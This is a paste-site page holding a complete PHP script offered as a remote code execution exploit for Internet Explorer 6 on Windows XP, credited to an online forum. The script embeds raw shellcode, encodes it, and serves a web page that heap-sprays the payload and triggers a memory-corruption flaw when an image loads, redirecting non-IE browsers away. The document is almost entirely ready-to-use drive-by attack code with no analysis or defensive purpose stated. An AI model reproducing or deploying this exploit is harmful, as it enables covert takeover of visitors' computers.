This site is developed to XHTML and CSS2 W3C standards.
If you see this paragraph, your browser does not support those standards and you
need to upgrade. Visit WaSP
for a variety of options.
Paste #683
Posted by: 18/05/2026
Posted on: 2026-05-18 10:44:40
Age: 1 day ago
Views: 12
<?php
// ================================================
// RCE Exploit for Internet Explorer 6.
// Works on Windows XP (all SPs)
//
// Made by www.downgrade-net.ru users. Join us!
//
// Problems?
// http://www.downgrade-net.ru/forum/topic.php?id=598
// ================================================
class RequestHandler {
private function payload_cnv($python_buf) {
$clean = preg_replace('/buf\s*\+?=\s*b?"?/', '', $python_buf);
$clean = preg_replace('/["\s;]/', '', $clean);
$hex = preg_replace('/[^0-9a-fA-F]/', '', $clean);
$binary = hex2bin($hex);
$enc_payload = '';
$len = strlen($binary);
for ($i = 0; $i < $len; $i += 2) {
$num = 0;
for ($j = 0; $j < 2; $j++) {
if ($i + $j < $len) {
$num += (ord($binary[$i + $j]) & 0xFF) << ($j * 8);
}
}
$enc_payload .= sprintf('%%u%04x', $num);
}
if ($len % 2 == 1) {
$enc_payload .= '%u0000';
}
return $enc_payload;
}
private function convert_to_utf16($payload) {
$enc_payload = '';
$len = strlen($payload);
for ($i = 0; $i < $len; $i += 2) {
$num = 0;
for ($j = 0; $j < 2; $j++) {
if ($i + $j < $len) {
$num += (ord($payload[$i + $j]) & 0xFF) << ($j * 8);
}
}
$enc_payload .= sprintf('%%u%04x', $num);
}
return $enc_payload;
}
private function get_payload() {
$python_buf = '
buf = b""
buf += b"\xb8\x1d\x7e\x57\xc7\xda\xd3\xd9\x74\x24\xf4\x5e\x29"
buf += b"\xc9\xb1\x3e\x83\xee\xfc\x31\x46\x11\x03\x46\x11\xe2"
buf += b"\xe8\xc0\x62\x59\xb2\x25\x54\xaa\x6b\x21\x42\xc1\xd4"
buf += b"\xfb\x43\x98\xd2\x78\x94\xdf\x13\x08\x15\xe3\x11\x66"
buf += b"\x6b\x0e\xe3\xe1\x54\x29\xf1\x48\xb8\x16\x73\xe6\x6a"
buf += b"\x2f\x3c\xba\x8f\x39\x54\xae\x52\xd3\x40\x5f\x72\x9e"
buf += b"\x0b\x58\x80\x00\x73\x83\x0e\xc4\x2e\xdb\x53\x07\xa3"
buf += b"\xfd\xef\x3c\xa4\xd5\x1e\x5c\xd5\xd3\xfc\x36\xdd\xd6"
buf += b"\x69\xd6\xab\x48\xdc\x83\x28\x0f\x9a\x59\x70\x33\x4f"
buf += b"\xfb\xb0\x9a\xb0\x6f\x4d\xc8\x99\x0a\x2a\x16\x7b\xb3"
buf += b"\xa4\xae\x75\x3a\x31\xca\x1e\x54\x0b\xba\xf7\x0e\x1f"
buf += b"\x0c\xc0\xdf\xbe\x31\x00\x0f\xb3\x01\xdd\x5d\x78\x00"
buf += b"\x23\x5b\xb4\xed\xeb\xcf\xaa\x81\x28\x6a\x58\x4c\xd5"
buf += b"\x5a\xf5\xbd\xee\x18\xfe\xce\xc0\xab\x33\x56\xc1\xcd"
buf += b"\xc1\x70\x0a\x89\x1c\x4d\x4f\xcc\x4e\x15\x66\xfd\x11"
buf += b"\x1c\xc4\xa9\xf6\x90\x17\x42\xc6\x21\x6c\xa3\x4d\xed"
buf += b"\x72\x0b\x9e\xa1\x14\x0a\xf7\x80\xf2\x8f\xa6\x33\x94"
buf += b"\xe5\x61\x8e\xae\x94\xc8\xb7\x47\xd7\x74\x2a\x81\x3b"
buf += b"\xe4\x22\x2d\x7b\xfc\xa4\xe8\x2d\x19\x06\xb2\xf4\x9d"
buf += b"\xc7\x95\x83\x22\x22\xf0\xd8\xa7\x40\x24\x79\xa0\x2e"
buf += b"\xd4\x0c\x92\x20\xd2\x2a\xa2\x4d\xbc\xd2\x37\x16\xe7"
buf += b"\x3a"
';
return $this->payload_cnv($python_buf);
}
private function create_gif_file() {
$gif_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=');
$filename = 'ququnta_zoofil.gif';
if (!file_exists($filename)) {
if (file_put_contents($filename, $gif_content) !== false) {
chmod($filename, 0644);
} else {
echo "<!-- Failed to create $filename. Check folder permissions!!! -->\n";
}
}
}
private function get_exploit() {
$this->create_gif_file();
$payload = $this->get_payload();
$nop = '%u0a0a%u0a0a';
$html = <<<HTML
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size = 0x80000;
var payload = unescape("{$payload}");
var nopsled = unescape("{$nop}");
while (nopsled.length < chunk_size)
nopsled += nopsled;
var nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data = "";
var tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}
function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank';
</script>
</head>
<body>
<span id="sp1">
<img src="ququnta_zoofil.gif" onload="ev1(event)">
</span>
</body>
</html>
HTML;
return $html;
}
public function handle() {
$uri = $_SERVER['REQUEST_URI'] ?? '/';
if ($uri === '/' || strpos($uri, '.php') !== false) {
header('Content-Type: text/html; charset=utf-8');
echo $this->get_exploit();
}
elseif (strpos($uri, 'ququnta_zoofil.gif') !== false) {
$gif = base64_decode('R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=');
header('Content-Type: image/gif');
header('Content-Length: ' . strlen($gif));
echo $gif;
}
else {
http_response_code(404);
echo "Not Found";
}
}
}
$handler = new RequestHandler();
$handler->handle();
?>
Download raw |
Create new paste
